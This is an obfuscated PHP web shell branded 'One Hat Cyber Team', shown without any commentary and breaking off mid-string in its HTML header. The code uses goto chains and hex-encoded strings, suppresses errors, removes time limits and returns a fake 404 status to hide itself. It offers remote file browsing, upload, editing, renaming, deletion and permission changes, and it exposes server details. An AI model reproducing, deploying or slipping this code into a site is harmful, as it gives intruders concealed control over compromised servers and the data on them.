pJrgA; EaJYU: Bh2fC: goto iPtuX; GrpvM: Y6Upm: goto SetU1; g4Bkd: goto YmvX_; goto APzPP; lBivr: $content = $_POST["\x66\151\x6c\x65\x5f\143\157\x6e\x74\145\156\164"]; goto gbyid; PdVkP: Fk3E1: goto pMfSC; PZxqg: if (isset($_GET["\141"])) { goto PW8sr; } goto e3oOU; QVXk5: if (!isset($_GET["\x70"])) { goto wXkgs; } goto xa4PM; QJcbe: goto WuWzI; goto SrtER; uNjg_: echo jD($_GET["\x6e"]); goto DbYJr; z00aG: if (!($_GET["\x74"] == "\x66")) { goto GRYEX; } goto o5NaW; T7PXl: $fileName = basename($uploadedFiles[$index]); goto yVA2j; Qns7R: goto WBrRw; goto qkvjE; C0rs5: goto PYt7W; goto R6obu; HB3Fv: echo "\74\x2f\x68\65\x3e\xd\xa\74\146\x6f\162\x6d\x20\155\x65\x74\150\x6f\144\x3d\42\160\157\x73\x74\42\x3e\15\12\x20\x20\40\x20\74\144\151\166\40\x63\154\x61\163\x73\x3d\42\x66\157\162\155\55\x67\162\x6f\x75\x70\42\76\xd\xa\x20\40\40\40\40\x20\x20\x20\x3c\151\156\x70\165\164\40\164\171\160\145\75\x22\x74\145\170\x74\x22\x20\x6e\141\155\x65\75\x22\x6e\145\x77\x5f\146\x69\154\145\137\156\x61\x6d\x65\42\x20\151\144\75\42\x6e\145\x77\137\x66\151\x6c\145\x5f\156\x61\155\x65\42\x20\143\154\141\x73\163\x3d\42\x62\x6f\162\144\x65\x72\40\160\55\61\x22\x20\166\x61\154\165\x65\75\x22"; goto uNjg_; LtzXz: if (!($im == "\156\x65\167\106\151\x6c\145")) { goto Y6Upm; } goto xYynO; sueaT: goto NA5Qf; goto caZJX; FfdSI: if (!($im == "\x63\x68\x61\x6e\147\145\120\145\x72\155\x73")) { goto Cw8Jm; } goto erhmN; zQPxb: $Jd = getcwd(); goto IV6J1; BeTGF: if (!file_exists($BL)) { goto l07qe; } goto tqIqH; XuBX4: echo "\x22\x20\x63\154\x61\x73\163\x3d\42\157\150\143\164\x22\x3e\x42\x75\x61\164\40\106\157\x6c\144\x65\x72\x3c\57\141\x3e\74\57\x6c\x69\76\15\12\74\x66\x6f\162\155\40\141\143\164\x69\157\x6e\x3d\x22\x22\x20\155\145\x74\150\x6f\144\75\x22\x50\x4f\123\x54\42\40\x65\156\x63\164\x79\160\x65\75\x22\155\165\x6c\164\x69\160\x61\x72\x74\57\x66\x6f\x72\155\x2d\x64\x61\x74\x61\42\x20\x73\x74\x79\154\x65\x3d\42\x70\141\x64\x64\x69\156\147\72\x20\x30\56\x31\x30\162\x65\x6d\73\x20\x64\x69\163\160\154\x61\171\72\40\x69\156\154\x69\x6e\x65\55\142\x6c\157\x63\153\x3b\x22\x3e\15\12\x20\x20\x20\40\x3c\151\x6e\x70\x75\164\x20\164\x79\160\145\75\x22\146\x69\154\x65\42\x20\x6e\x61\x6d\145\75\42\146\x5b\x5d\x22\x20\155\x75\154\164\151\x70\154\x65\76\15\xa\x20\40\40\x20\x3c\151\x6e\x70\x75\164\40\x74\171\x70\x65\75\x22\163\165\142\155\151\x74\x22\x20\x76\141\154\x75\x65\x3d\42\x55\x70\x6c\157\x61\x64\42\x20\x6e\141\155\x65\75\42\163\x75\142\x6d\151\x74\x22\40\x63\x6c\x61\163\x73\75\42\x62\x75\x74\x74\157\156\40\157\x68\x63\164\x22\76\xd\12\74\x2f\146\x6f\162\155\x3e\xd\12"; goto zQPxb; CgOkh: echo php_uname(); goto EdS_l; ckKLx: xe("\113\157\156\164\x65\x6e\40\146\x69\154\x65\x20\x62\x65\162\150\141\163\x69\x6c\x20\144\x69\x70\x65\162\x62\x61\x72\x75\151", 1, "\46\x61\x3d" . sS("\x76\151\145\167") . "\x26\x6e\75{$_GET["\x6e"]}"); goto OPLx1; v3G9M: foreach ($G3 as $F1) { goto ruO3g; JOFka: ujbhv: goto glGuu; D3Ydb: $kL = $kL > 1024 ? round($kL / 1024, 2) . "\x20\x20\115\102" : $kL . "\x20\40\113\102"; goto ldehu; v2noY: F6uUG: goto nnWwd; bcKKF: TomPa: goto cb8nr; ldehu: echo "\15\12\x3c\164\x72\x3e\15\xa\74\x74\144\x20\x73\164\171\x6c\145\x3d\42\x74\x65\x78\x74\55\141\x6c\x69\x67\156\x3a\x20\x6c\x65\146\x74\73\42\x3e\xd\12\x3c\151\x20\x63\x6c\x61\x73\x73\75\x22\146\x61\40\x66\141\x2d\x66\x77\40\146\141\55\146\151\154\145\55\157\42\40\x73\x74\x79\x6c\x65\x3d\42\x62\x6f\162\x64\x65\x72\72\40\x30\x3b\160\141\x64\x64\151\156\x67\72\x20\60\x3b\167\151\x64\x74\150\72\40\61\x2e\62\x38\65\67\x31\x34\x32\x39\145\155\73\x22\x3e\x3c\57\151\x3e\x3c\141\x20\150\x72\x65\x66\x3d\42\x3f\160\75" . SS($Jd) . "\x26\x61\x3d" . sS("\x76\151\x65\167") . "\x26\x6e\x3d" . SS($F1) . "\42\x20\x64\x61\x74\x61\x2d\164\x6f\x67\147\154\145\x3d\42\164\157\157\x6c\x74\x69\x70\x22\40\144\x61\x74\141\x2d\x70\154\x61\143\145\x6d\x65\x6e\x74\x3d\x22\141\165\x74\157\x22\40\x74\151\x74\154\145\x3d\42\114\141\x74\145\x73\164\40\155\157\144\x69\146\171\40\x6f\156\40" . $c8[19]("\131\55\x6d\55\144\x20\110\72\x69", $c8[20]("{$Jd}\57{$F1}")) . "\x22\76{$F1}\x3c\57\141\76\74\57\164\x64\x3e\15\12\x3c\x74\x64\x3e\x3c\x73\160\141\x6e\76{$kL}\74\x2f\163\160\x61\x6e\x3e\x3c\57\164\144\76\xd\xa\74\x74\144\x3e\xd\xa\x20\40\40\40\40\40\40\40\x20\40\40\40\40\x20\x20\40\40\40\x20\40\74\141\40\150\162\145\x66\75\x22\x3f\x70\75" . SS($Jd) . "\46\141\75" . sS("\x63\150\141\156\x67\x65\120\x65\162\155\x73") . "\x26\156\75" . SS($F1) . "\42\40\x64\141\164\x61\x2d\164\x6f\x67\x67\154\x65\75\42\164\x6f\157\154\x74\x69\x70\x22\40\x64\141\164\141\x2d\160\x6c\141\x63\x65\155\145\x6e\x74\75\42\x61\165\164\x6f\42\x20\164\x69\164\x6c\x65\x3d\42\103\x68\141\x6e\147\x65\x20\120\x65\x72\x6d\151\x73\x73\x69\157\156\x73\x22\40\144\x61\x74\x61\55\157\162\151\x67\x69\156\141\x6c\55\x74\x69\164\154\x65\x3d\42\x43\x68\x61\156\147\x65\40\x50\145\x72\x6d\151\163\x73\151\x6f\156\x73\x22\x3e\x3c\x66\x6f\156\164\x20\x63\157\154\157\x72\x3d\x22" . ($c8[8]("{$Jd}\x2f{$F1}") ? "\43\x30\x30\146\x66\60\x30" : (!$c8[9]("{$Jd}\x2f{$F1}") ? "\43\x30\60\x62\x66\146\146" : null)) . "\x22\x3e" . rN("{$Jd}\x2f{$F1}") . "\x3c\57\146\x6f\x6e\164\x3e\x3c\x2f\x61\76\15\xa\40\x20\x20\40\x20\x20\40\40\40\x20\40\40\40\40\x20\40\x3c\57\164\x64\76\15\xa\x3c\x74\144\76\x3c\141\x20\x68\162\145\x66\x3d\x22\77\160\x3d" . Ss($Jd) . "\46\141\75" . Ss("\145\x64\x69\164") . "\x26\x6e\x3d" . SS($F1) . "\x22\x20\x64\141\x74\141\55\164\x6f\147\x67\154\145\x3d\42\x74\157\x6f\154\164\x69\160\x22\x20\144\x61\x74\141\55\x70\154\141\143\145\x6d\x65\156\164\x3d\x22\141\x75\164\x6f\42\40\x74\151\x74\x6c\x65\x3d\x22\105\144\151\164\x22\76\x45\x64\x69\164\x3c\x2f\141\76\74\57\x74\x64\x3e\15\xa\x3c\x74\144\76\74\141\40\150\162\145\x66\x3d\42\x3f\160\75" . ss($Jd) . "\46\141\x3d" . SS("\x72\x65\156\x61\x6d\145") . "\46\156\x3d" . ss($F1) . "\x26\164\75\146\x22\40\144\x61\x74\x61\55\164\x6f\x67\147\x6c\x65\75\x22\164\x6f\x6f\x6c\x74\151\x70\x22\40\144\x61\164\x61\x2d\160\154\141\x63\145\155\145\x6e\164\75\x22\141\x75\x74\x6f\42\x20\x74\151\164\x6c\x65\75\x22\122\145\156\141\x6d\x65\42\x3e\x52\x65\x6e\141\x6d\145\74\x2f\x61\76\74\x2f\164\x64\x3e\xd\xa\x3c\x74\x64\x3e\74\141\x20\150\x72\145\x66\x3d\42\77\x70\x3d" . ss($Jd) . "\x26\x61\75" . sS("\x64\x65\154\145\164\145") . "\46\156\75" . ss($F1) . "\42\40\x63\154\x61\x73\x73\75\42\x64\x65\154\145\x74\145\42\40\x64\x61\164\141\x2d\x74\171\x70\x65\75\42\146\151\154\145\42\40\x64\x61\164\x61\55\164\x6f\147\x67\154\x65\x3d\x22\164\157\157\x6c\164\151\x70\42\40\x64\x61\164\x61\x2d\x70\x6c\141\x63\145\x6d\145\x6e\164\x3d\x22\x61\165\164\157\42\x20\x74\x69\164\x6c\x65\75\42\x44\145\154\145\x74\145\x22\76\x44\145\154\145\x74\145\74\x2f\141\76\74\x2f\x74\x64\x3e\15\xa\x3c\57\x74\x72\76"; goto v2noY; glGuu: goto F6uUG; goto bcKKF; v9Eba: $kL = round($kL, 3); goto D3Ydb; ruO3g: if (!$c8[7]("{$Jd}\57{$F1}")) { goto ujbhv; } goto FaOlZ; nnWwd: WFhx4: goto RoXaA; cb8nr: $kL = $c8[10]("{$Jd}\57{$F1}") / 1024; goto v9Eba; FaOlZ: goto TomPa; goto JOFka; RoXaA: } goto KQMnt; OPLx1: WBrRw: goto Pou2M; KH9aY: function rn($F1) { goto Ejvon; zVqOc: n1F3e: goto EdX4F; l2o3k: HQRNE: goto L0VkZ; A3WMM: if (!(($Jd & 0x6000) == 0x6000)) { goto n1F3e; } goto Bqxqf; oofvc: goto Qxl4a; goto OqJkb; bFELY: pUF7c: goto Ad9mp; oqOEA: JthAK: goto DNxB7; XpXso: $lE = "\x6c"; goto GC653; szoa_: BDLif: goto hiN2A; UVoP8: goto Qxl4a; goto bFELY; aQqQF: cLJz2: goto uxsoy; nKEdw: if (!(($Jd & 0x2000) == 0x2000)) { goto JthAK; } goto l48bI; Ejvon: $Jd = fileperms($F1); goto T8j0w; huuz4: goto Qxl4a; goto sSQX4; kLO5U: goto Qxl4a; goto KOXs1; rGNN8: if (!(($Jd & 0xa000) == 0xa000)) { goto Tt_g_; } goto UWWll; Gyg5Y: $lE .= $Jd & 0x4 ? "\x72" : "\55"; goto wr2W5; kKDNR: return $lE; goto U5w5P; wr2W5: $lE .= $Jd & 0x2 ? "\x77" : "\55"; goto AQ5h1; GYiif: Tt_g_: goto cqeNy; tISrq: $lE .= $Jd & 0x20 ? "\x72" : "\x2d"; goto Wh334; a0iTu: goto pUF7c; goto jphQA; L0VkZ: $lE = "\55"; goto hjz5U; AQ5h1: $lE .= $Jd & 0x1 ? $Jd & 0x200 ? "\x74" : "\x78" : ($Jd & 0x200 ? "\124" : "\x2d"); goto kKDNR; OqJkb: wUPiF: goto XwcR2; uxsoy: $lE = "\142"; goto UVoP8; a1QMB: $lE .= $Jd & 0x8 ? $Jd & 0x400 ? "\x73" : "\x78" : ($Jd & 0x400 ? "\123" : "\x2d"); goto Gyg5Y; ZjeVr: goto HQRNE; goto PR2BP; XwcR2: $lE = "\160"; goto yFMrk; kSaVg: goto Qxl4a; goto szoa_; Wh334: $lE .= $Jd & 0x10 ? "\x77" : "\55"; goto a1QMB; Bqxqf: goto cLJz2; goto zVqOc; lW0lD: NZDZ0: goto otWx5; cqeNy: if (!(($Jd & 0x8000) == 0x8000)) { goto zIUdf; } goto ZjeVr; jphQA: SoToc: goto nKEdw; KOXs1: tPwHT: goto YHcDD; PR2BP: zIUdf: goto A3WMM; otWx5: $lE = "\x75"; goto kLO5U; EdX4F: if (!(($Jd & 0x4000) == 0x4000)) { goto SoToc; } goto a0iTu; BMObp: $lE .= $Jd & 0x80 ? "\167" : "\55"; goto uN3A5; l48bI: goto BDLif; goto oqOEA; wEWqy: DSca2: goto rGNN8; DNxB7: if (!(($Jd & 0x1000) == 0x1000)) { goto NZDZ0; } goto ilQKi; uN3A5: $lE .= $Jd & 0x40 ? $Jd & 0x800 ? "\x73" : "\170" : ($Jd & 0x800 ? "\123" : "\55"); goto tISrq; UWWll: goto OTKPa; goto GYiif; N1Dtg: $lE .= $Jd & 0x100 ? "\162" : "\x2d"; goto BMObp; T8j0w: if (!(($Jd & 0xc000) == 0xc000)) { goto DSca2; } goto XuXN8; XuXN8: goto tPwHT; goto wEWqy; hjz5U: goto Qxl4a; goto aQqQF; ilQKi: goto wUPiF; goto lW0lD; sSQX4: OTKPa: goto XpXso; hiN2A: $lE = "\143"; goto oofvc; Ad9mp: $lE = "\144"; goto kSaVg; YHcDD: $lE = "\163"; goto huuz4; yFMrk: Qxl4a: goto N1Dtg; GC653: goto Qxl4a; goto l2o3k; U5w5P: } goto P25a0; gbyid: $currentDir = getcwd(); goto JkfzH; yzR0z: echo "\74\x68\65\40\143\x6c\x61\163\x73\75\42\x70\55\x31\40\162\x61\151\x6e\x62\x6f\x77\x2d\x62\x6f\162\144\x65\x72\x22\40\163\164\x79\154\145\75\42\164\145\170\x74\55\x61\154\x69\147\156\72\40\x63\145\156\x74\x65\162\x3b\x22\76\105\144\x69\164\40\x4e\141\155\141\x20\106\x69\154\145\72\40\74\146\157\x6e\164\40\143\x6f\154\x6f\162\x3d\42\x77\150\x69\x74\145\x22\76"; goto CmQdn; GAJ_p: goto WuWzI; goto V60JP; lAGVG: lVpvL: goto MhAYt; Y6O3j: YepRA: goto gQPY8; hgzvg: Xe("\107\141\147\x61\x6c\x20\155\145\x6e\x67\165\142\x61\150\x20\x69\x7a\x69\156", 0); goto Nc198; UYCID: error_reporting(0); goto M5v3C; l8csR: cHfGd: goto ANEwH; pUQui: echo "\74\57\x73\x70\x61\x6e\x3e\74\57\154\x69\76\xd\12\74\154\151\76\x53\145\x72\x76\x65\162\40\72\40\74\163\x70\141\x6e\40\x73\164\171\x6c\145\75\x22\143\157\x6c\x6f\162\72\40\167\150\151\x74\145\x3b\42\76"; goto CgOkh; raqMq: if (!isset($_POST["\x63\162\x65\141\x74\145\137\146\x6f\x6c\x64\145\162"])) { goto nRhJi; } goto f5aRU; ks9gk: echo jD($_GET["\x6e"]); goto uiNll; cU25L: $G3 = $c8[5]($G3($Jd), ["\x2e", "\x2e\56"]); goto QUero; a5Rw_: GRYEX: goto h0yNe; tqIqH: Xe("\x66\x61\151\x6c\x65\x64\x20\164\157\40\x64\x65\x6c\x65\164\145\40\164\150\145\40\146\157\x6c\x64\145\x72", 0); goto qWFN0; ZB075: goto hodfB; goto e7SSd; l6lHy: $folderPath = "{$currentDir}\57{$folderName}"; goto DmZNj; klVg8: echo "\x3c\x74\x61\142\x6c\x65\x20\143\x6c\x61\163\163\x3d\x22\164\x61\x62\154\x65\40\x74\x61\x62\x6c\145\55\x68\157\x76\x65\x72\40\164\x61\142\154\145\x2d\142\157\x72\x64\145\x72\x6c\x65\x73\x73\40\x74\x61\x62\x6c\x65\55\x73\155\x22\x20\163\x74\x79\154\145\75\x22\164\x65\x78\x74\x2d\x61\154\151\147\156\x3a\x20\143\145\x6e\164\145\x72\73\167\151\144\164\x68\72\x20\x31\x30\x30\45\73\x22\x3e\xd\xa\74\164\x68\145\x61\x64\x20\x63\154\x61\163\163\x3d\42\164\145\170\x74\x2d\154\x69\147\150\164\42\76\15\xa\x3c\164\x72\76\xd\12\74\164\150\x20\x73\x74\x79\x6c\145\x3d\42\x77\x69\144\x74\150\72\40\64\65\45\73\x22\76\116\x61\155\x65\x3c\x2f\x74\x68\x3e\xd\xa\74\164\150\x20\163\x74\171\154\145\75\x22\x77\x69\x64\164\x68\x3a\x20\61\x33\45\x3b\42\x3e\123\x69\172\x65\74\x2f\164\x68\76\xd\xa\74\x74\150\40\163\x74\171\154\145\x3d\x22\167\x69\x64\x74\150\72\40\61\63\x25\73\x22\76\x50\x65\162\155\151\163\x73\x69\x6f\156\74\57\x74\x68\76\xd\12\x3c\164\150\x20\x63\157\x6c\163\160\x61\x6e\x3d\x22\63\x22\x3e\x41\143\x74\x69\157\156\74\x2f\x74\x68\x3e\15\12\74\x2f\x74\162\76\15\xa\74\57\164\150\x65\x61\x64\76\xd\12\x3c\x74\x62\157\144\x79\x20\143\154\x61\163\x73\x3d\42\164\x65\x78\164\x2d\154\x69\147\150\164\x22\x3e\x20"; goto cU25L; epYd3: $newName = $_POST["\x6e\145\x77\x5f\146\x69\154\145\137\156\141\155\x65"]; goto f7MJK; iOZrz: $fileName = $_POST["\146\151\x6c\x65\137\156\141\x6d\145"]; goto lBivr; xc4pX: $BL = $Jd . "\57" . jd($_GET["\x6e"]); goto aTsk5; iJrKt: goto llzId; goto PBWDG; z47JB: goto WuWzI; goto S2fjQ; Pou2M: XR5kC: goto hky0H; qZkE2: $G3 = "\x73\x63\141\156\x64\151\162"; goto VYu6Z; V4aUK: nhGdW: goto xc4pX; e7SSd: dT1Z5: goto qMY7j; I4Mr8: YmvX_: goto IP9JK; ZZiIv: if (!($index < $totalFiles)) { goto seOwc; } goto GIuA3; yexD7: seOwc: goto gjAvo; TR99t: $uploadedFiles = $_FILES["\146"]["\x6e\x61\155\145"]; goto CzeEQ; Lm_zM: l07qe: goto ImbKT; dJDOB: hodfB: goto X4MLJ; M5v3C: set_time_limit(0); goto ppUof; y8gBw: function Ss($SP) { goto VFIvz; UxKJ8: vxoby: goto x5OgC; YNm8N: XGek7: goto Q9fln; n9px0: ltYIR: goto BZWFo; aBxNw: goto h3xPx; goto YNm8N; zSA_R: $lE = 0; goto UxKJ8; Fyu82: return $dE; goto KN0eH; Acvg3: h3xPx: goto Fyu82; VFIvz: $dE = ''; goto zSA_R; tVInM: goto vxoby; goto Acvg3; BZWFo: $lE++; goto tVInM; Q9fln: $dE .= dechex(ord($SP[$lE])); goto n9px0; x5OgC: if ($lE < strlen($SP)) { goto XGek7; } goto aBxNw; KN0eH: } goto fRdU4; sZ6bB: echo "\x3c\x68\65\40\143\x6c\141\163\x73\75\42\x70\x2d\x31\x20\162\141\151\156\x62\x6f\x77\55\x62\157\x72\144\145\x72\42\x20\163\164\x79\154\x65\75\x22\x74\x65\170\x74\x2d\141\x6c\x69\x67\156\72\40\x63\x65\x6e\164\x65\x72\x3b\42\x3e\x4e\141\155\x61\x20\x46\151\x6c\x65\40\102\x61\x72\165\x20\72\x3c\x2f\150\x35\x3e\15\xa\74\146\x6f\162\155\x20\x6d\x65\164\150\157\144\x3d\x22\x70\x6f\163\164\x22\x3e\15\xa\x20\x20\x20\40\x3c\x64\x69\166\x20\x63\x6c\141\163\163\x3d\x22\146\157\162\x6d\55\147\162\157\165\160\42\x3e\xd\xa\x20\40\40\40\40\40\x20\40\x3c\x69\156\x70\165\164\x20\164\x79\160\145\75\42\x74\145\170\x74\x22\x20\x6e\141\x6d\x65\x3d\x22\146\x69\154\145\x5f\156\x61\x6d\x65\42\x20\151\144\x3d\x22\146\151\x6c\x65\x5f\156\x61\155\x65\x22\x20\x63\x6c\x61\x73\x73\75\x22\x62\x6f\x72\x64\x65\x72\x20\160\55\x31\42\40\x73\164\171\x6c\x65\75\42\164\x65\x78\x74\55\x61\154\x69\x67\156\x3a\x20\143\145\156\x74\x65\x72\73\x22\76\xd\12\x20\40\x20\x20\74\57\144\151\166\76\xd\xa\40\40\40\x20\74\144\x69\166\40\x63\154\x61\163\163\x3d\42\x66\x6f\162\x6d\55\147\162\157\x75\160\42\x3e\xd\xa\x20\x20\x20\40\x20\40\x20\x20\x3c\x74\x65\170\x74\x61\x72\x65\x61\x20\163\x74\x79\x6c\x65\75\42\x72\145\163\151\172\145\72\156\157\x6e\x65\x22\40\156\141\155\145\75\x22\x66\151\154\145\137\143\x6f\x6e\164\x65\x6e\164\x22\40\151\144\x3d\x22\146\x69\x6c\x65\137\143\157\x6e\x74\145\x6e\x74\x22\x20\x63\x6f\x6c\163\75\42\63\60\42\x20\x72\x6f\x77\x73\75\42\x31\60\42\40\x63\x6c\141\x73\163\75\x22\146\x6f\162\155\x2d\x63\157\x6e\164\x72\x6f\154\x20\x72\x61\x69\x6e\142\157\x77\55\142\x6f\162\x64\145\162\x22\x3e\74\x2f\164\145\x78\x74\x61\162\x65\141\x3e\15\xa\40\x20\x20\40\74\57\x64\x69\x76\76\xd\xa\x20\40\40\x20\x3c\144\151\166\40\143\x6c\141\x73\163\x3d\42\146\x6f\162\155\x2d\147\x72\x6f\165\160\42\40\163\164\x79\x6c\x65\x3d\x22\155\141\x72\x67\151\x6e\55\164\157\160\x3a\40\61\60\160\x78\x3b\42\x3e\15\12\40\40\40\x20\40\40\x20\40\x3c\x62\165\164\164\x6f\x6e\40\164\171\x70\145\x3d\42\x73\x75\x62\155\x69\164\x22\40\x6e\x61\x6d\x65\75\x22\x63\x72\x65\141\x74\145\137\146\151\x6c\x65\42\40\143\154\x61\163\163\75\x22\157\150\x63\164\x22\x3e\x43\162\145\x61\x74\145\74\x2f\x62\165\x74\x74\157\156\76\xd\xa\x20\x20\x20\x20\74\x2f\144\x69\166\76\15\12\74\57\146\157\162\155\x3e\15\12\xd\12"; goto aRFgz; X4MLJ: goto Bym5W; goto lAGVG; JqxaL: if (mkdir($folderPath)) { goto dT1Z5; } goto BrZJD; g0l1M: SCm92: goto lygUa; ImbKT: xe("\x66\x6f\154\x64\x65\162\40\144\x65\154\145\164\145\144\x20\x73\165\x63\x63\x65\163\x73\x66\165\x6c\x6c\x79"); goto RgCVA; McJVv: echo "\15\12\x3c\x2f\x64\151\x76\x3e\xd\xa\74\x64\x69\166\40\x63\154\x61\163\x73\75\42\x74\x61\x62\154\x65\55\x72\x65\163\160\157\156\163\151\x76\145\x20\164\145\170\x74\55\154\151\147\150\164\40\162\141\x69\x6e\142\157\x77\55\x62\157\162\x64\x65\162\42\x20\x73\x74\171\x6c\145\75\x22\x74\145\x78\164\55\x61\154\x69\147\156\x3a\40\154\145\146\x74\73\x70\x61\x64\x64\151\156\147\72\x20\64\x70\170\x3b\x6d\141\x72\x67\151\x6e\55\x62\157\164\x74\x6f\155\x3a\40\x33\x70\170\x3b\155\x61\162\x67\x69\x6e\x2d\x74\157\160\72\40\63\160\170\x3b\x22\76\xd\12\74\x6c\x69\x3e\x44\151\x72\40\x3a\40\x3c\163\160\141\x6e\76"; goto eJzBg; UGZfs: Bym5W: goto gNdcw; IOs5m: goto JuQTj; goto b1Prt; xYynO: goto CiuOO; goto GrpvM; gjAvo: j8Ne4: goto McJVv; ned6r: if (isset($_GET["\x61"])) { goto DqkC1; } goto g4Bkd; ppUof: http_response_code(404); goto K0vFC; WY826: $fileName = basename(jD($_GET["\156"])); goto Uj6Nn; aTsk5: if (!($_GET["\x74"] == "\x64")) { goto GqE6o; } goto fFAU6; o5NaW: unlink($BL); goto dG_yF; P25a0: function Xe($OB, $Ch = 1, $BL = '') { goto lO7HY; lO7HY: global $Jd; goto Vijni; FfS6u: echo "\x3c\163\x63\162\x69\x70\x74\76\163\x77\141\x6c\50\x7b\x74\151\x74\x6c\145\x3a\40\x22{$xe}\x22\54\x20\164\x65\170\164\x3a\x20\42{$OB}\x22\54\40\151\143\x6f\156\x3a\x20\x22{$xe}\42\175\51\56\x74\150\x65\156\50\50\x62\164\x6e\103\x6c\x69\143\153\51\x20\75\x3e\40\173\151\146\x28\x62\x74\x6e\x43\x6c\x69\143\153\51\173\144\x6f\143\165\x6d\145\156\x74\x2e\x6c\x6f\143\x61\164\151\157\x6e\56\150\x72\145\146\x3d\x22\x3f\160\75" . Ss($Jd) . $BL . "\x22\175\x7d\51\74\x2f\x73\x63\162\151\160\x74\76"; goto JpMfM; Vijni: $xe = $Ch == 1 ? "\x73\165\143\x63\x65\163\x73" : "\145\162\x72\157\x72"; goto FfS6u; JpMfM: } goto nsWn8; VYu6Z: $c8 = ["\67\x30\66\70\67\60\65\146\x37\65\x36\x65\66\x31\66\x64\66\65", "\x37\x30\66\70\x37\60\x37\x36\x36\x35\67\62\x37\63\66\71\66\x66\x36\145", "\66\x37\x36\65\67\x34\x36\x33\x37\x37\66\x34", "\x36\63\x36\x38\x36\64\x36\71\67\x32", "\67\x30\x37\x32\x36\65\66\x37\65\146\x37\63\67\60\66\143\x36\x39\67\64", "\66\61\67\x32\67\62\66\61\67\x39\65\146\66\64\66\71\x36\x36\66\66", "\x36\x39\67\63\65\146\66\64\x36\71\x37\62", "\66\71\x37\63\65\146\x36\x36\66\71\66\143\x36\65", "\66\71\x37\x33\65\x66\67\x37\x37\x32\66\x39\x37\64\66\x31\66\62\66\143\x36\65", "\x36\71\x37\63\x35\x66\67\x32\x36\x35\66\x31\x36\x34\66\61\x36\62\x36\x63\66\65", "\x36\x36\x36\x39\x36\143\66\x35\67\63\66\x39\x37\141\x36\65", "\x36\63\66\x66\x37\x30\x37\71", "\x36\x36\66\x39\66\x63\66\x35\x35\146\x36\65\x37\x38\66\x39\67\63\67\x34\x37\63", "\x36\66\x36\71\66\x63\x36\x35\65\x66\x37\x30\67\x35\x37\x34\65\x66\66\63\66\146\66\145\x37\x34\66\65\66\145\x37\x34\67\63", "\66\66\66\x39\66\x63\x36\65\x35\146\x36\x37\x36\65\x37\64\65\x66\66\x33\66\x66\x36\x65\67\64\66\x35\x36\145\x37\x34\67\63", "\x36\x64\66\x62\66\64\66\71\x37\62", "\x37\x32\66\65\x36\145\66\x31\x36\144\66\x35", "\67\63\67\64\67\62\x37\64\x36\146\x37\x34\x36\71\66\144\x36\x35", "\x36\x38\x37\x34\66\144\66\x63\67\x33\x37\x30\66\x35\66\x33\x36\x39\x36\61\x36\x63\66\x33\66\x38\x36\x31\x37\62\67\x33", "\66\x34\66\x31\67\64\x36\65", "\66\66\66\71\66\143\x36\x35\x36\144\67\x34\x36\71\66\x64\x36\65"]; goto HhbxK; XbO1F: jpk0X: goto ui5BY; ui5BY: $index++; goto s1u_6; fJZSg: auqgv: goto m_WJB; yNbhO: $oldPath = "{$currentDir}\x2f" . jD($_GET["\x6e"]); goto W_YUR; xa4PM: goto SCm92; goto WsTPz; eucg0: xE("\x4e\x61\x6d\x61\40\146\151\154\145\40\164\x65\154\x61\x68\x20\144\x69\147\x75\156\x61\153\141\156", 0, "\x26\x61\75" . SS("\x6e\x65\167\x46\x69\x6c\145")); goto ThB_8; CKeJG: echo "\40\15\xa\74\41\104\117\x43\124\x59\x50\x45\40\150\164\x6d\x6c\x3e\xd\12\x3c\x68\x74\155\154\40\x6c\141\x6e\x67\x3d\x22\145\x6e\x22\76\xd\xa\74\150\x65\x61\x64\76\15\12\x20\x20\40\40\74\x6d\x65\x74\141\x20\160\x72\157\x70\145\x72\164\x79\75\42\x6f\x67\x3a\151\x6d\141\x67\x65\42\x20\143\x6f\156\164\x65\x6e\164\75\x22\57\57\x69\56\x69\155\147\165\162\x2e\143\157\x6d\x2f\x72\x72\x6f\124\120\x42\113\x2e\152\x70\x65\147\42\76\xd\xa\40\40\x20\x20\74\x6d\145\164\x61\40\160\x72\x6f\160\145\x72\x74\x79\x3d\x22\x6f\147\72\x74\x69\164\x6c\145\x22\40\143\x6f\156\x74\x65\x6e\164\75\x22\117\x6e\145\40\x48\141\164\x20\103\x79\x62\x65\x72\40\124\145\141\x6d\42\x3e\xd\12\x20\x20\40\40\74\155\145\164\x61\x20\x70\x72\x6f\x70\145\x72\164\171\x3d\42\157\147\x3a\x64\x65\x73\x63\162\151\160\x74\x69\x6f\156\x22\x20\143\x6f\156\164\145\x6e\x74\x3d\x22\102\171\x20\115\162\56\x43\x6f\x6d\142\145\x74\42\x3e\xd\xa\x20\x20\40\40\x3c\155\x65\x74\x61\x20\156\x61\155\145\x3d\x22\164\x68\x65\x6d\145\55\x63\x6f\154\x6f\x72\42\40\x63\157\156\164\145\x6e\x74\x3d\x22\43\x30\x30\142\x66\146\146\x22\x3e\xd\xa\x20\40\40\x20\74\x6d\x65\x74\141\40\x6e\141\155\x65\75\42\x76\x69\x65\x77\160\x6f\x72\164\x22\x20\x63\x6f\x6e\164\145\x6e\x74\75\x22\x77\x69\x64\164\150\x3d\144\x65\166\x69\143\x65\x2d\x77\151\x64\164\150\54\40\151\x6e\151\x74\151\x61\x6c\55\x73\143\x61\x6c\x65\x3d\x30\56\x36\x30\54\40\163\150\x72\151\156\x6b\55\164\157\x2d\x66\x69\x74\75\156\157\42\76\15\12\40\x20\40\x20\74\x74\x69\164\154\145\76\117\156\145\x20\110\x61\164\40\x43\171\142\x65\x72\40\124\x65\x61\155\x3c\57\x74\151\164\x6c\145\76\15\12\40\x20\x20\x20\x3c\154\x69\156\x6b\40\162\x65\x6c\x3d\42\x73\164\171\x6c\x65\163\x68\x65\145\x74\x22\x20\x68\162\x65\x66\x3d\42\x2f\x2f\x63\x64\156\56\x6a\x73\144\145\x6c\151\166\162\56\x6e\x65\164\57\x6e\160\x6d\x2f\x62\157\x6f\164\x73\164\x72\x61\x70\x40\64\56\66\x2e\60\x2f\x64\151\163\164\x2f\x63\163\163\x2f\142\157\x6f\164\163\x74\x72\x61\x70\x2e\155\x69\x6e\56\143\163\163\x22\x3e\xd\xa\40\40\40\x20\x3c\x6c\x69\x6e\x6b\x20\x72\x65\154\75\42\163\164\171\x6c\x65\163\150\x65\145\x74\42\x20\150\x72\x65\146\x3d\42\57\57\x63\x64\156\152\x73\56\x63\x6c\157\x75\144\146\154\141\162\145\x2e\143\x6f\155\x2f\x61\x6a\x61\170\x2f\x6c\151\x62\163\x2f\x66\157\x6e\164\x2d\141\x77\145\x73\157\155\x65\57\x34\x2e\x37\56\x30\x2f\143\163\x73\57\x66\157\x6e\x74\x2d\x61\x77\145\1